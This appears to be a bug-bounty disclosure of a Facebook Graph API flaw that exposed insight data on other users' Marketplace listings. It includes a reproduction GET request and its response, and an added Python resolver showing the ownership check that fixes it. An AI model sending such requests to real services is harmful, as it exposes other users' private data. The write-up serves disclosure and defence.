View Insights for Any Facebook Marketplace Product

Using an API call, it is possible to view the insights (specifically impressions) of any product listed on Facebook Marketplace, even when the session user did not create that listing.

This vulnerability could be particularly useful in competitive markets (e.g. housing), where professionals such as real estate brokers could check these insights on competing listings to gain an advantage.

Reproduction

Using my alt account to view the insights of a Marketplace Product (ID: 1276378595796681) created using my primary account.

My alt account is not supposed to have access to the insight details of a Marketplace product it didn’t create.

HTTP GET
https://graph.facebook.com/v2.12/graphql?q=node(1276378595796681){messaged_person_count}&access_token=ACCESS_TOKEN

Response:

{
  "1276378595796681": {
    "messaged_person_count": 1
  }
}

Given that this alt user did not create this product listing, the above insights should not have been shown.

This PoC could be repeated to view the insights of any other listing on Marketplace, including regular products, property rentals, cars, etc.
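The root cause is a missing ownership check on insight fields: a valid access token was enough to read messaged_person_count on a listing the viewer did not own. The resolver below is an added illustration of the server-side fix, not Facebook's code; the listing store, the owner and viewer ids, the impressions value and the non-insight fields (title, price) are constructed for the example.

```python
# Added illustration of the missing check: insight fields on a listing
# must be gated on ownership, not merely on a valid access token.
# The listing store, viewer ids and non-insight fields are constructed.
from dataclasses import dataclass, field

# Fields any authenticated viewer may read on a Marketplace listing (constructed).
PUBLIC_FIELDS = {"title", "price"}
# Insight fields that only the listing's creator may read.
OWNER_ONLY_FIELDS = {"messaged_person_count", "impressions"}


@dataclass
class Listing:
    node_id: str
    owner_id: str
    data: dict = field(default_factory=dict)


# Constructed sample store keyed by node id; the id is the one from the PoC,
# the owner id and field values are made up.
LISTINGS = {
    "1276378595796681": Listing(
        node_id="1276378595796681",
        owner_id="primary-account",
        data={"title": "Apartment", "price": 1200,
              "messaged_person_count": 1, "impressions": 40},
    ),
}


class Forbidden(Exception):
    """Raised when the viewer requests a field it is not allowed to read."""


def resolve_node(viewer_id: str, node_id: str, fields: list) -> dict:
    """Resolve node(<id>){fields} for viewer_id with a per-field owner check.

    Every requested field is authorized before any value is copied out, so a
    mixed request (public field + insight field) by a non-owner is rejected
    whole rather than leaking partial insight data.
    """
    listing = LISTINGS.get(node_id)
    if listing is None:
        raise KeyError(node_id)
    is_owner = viewer_id == listing.owner_id
    for name in fields:
        if name not in PUBLIC_FIELDS | OWNER_ONLY_FIELDS:
            raise ValueError(f"unknown field {name}")
        if name in OWNER_ONLY_FIELDS and not is_owner:
            raise Forbidden(f"{name} is visible to the listing owner only")
    # Keep the report's response shape: {node_id: {field: value}}.
    return {node_id: {name: listing.data[name] for name in fields}}
```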

Timeline

2018-03-06: Report Submitted

2018-03-09: Further Investigation by Facebook

2018-03-23: Fixed by Facebook

2018-03-28: Bounty Awarded by Facebook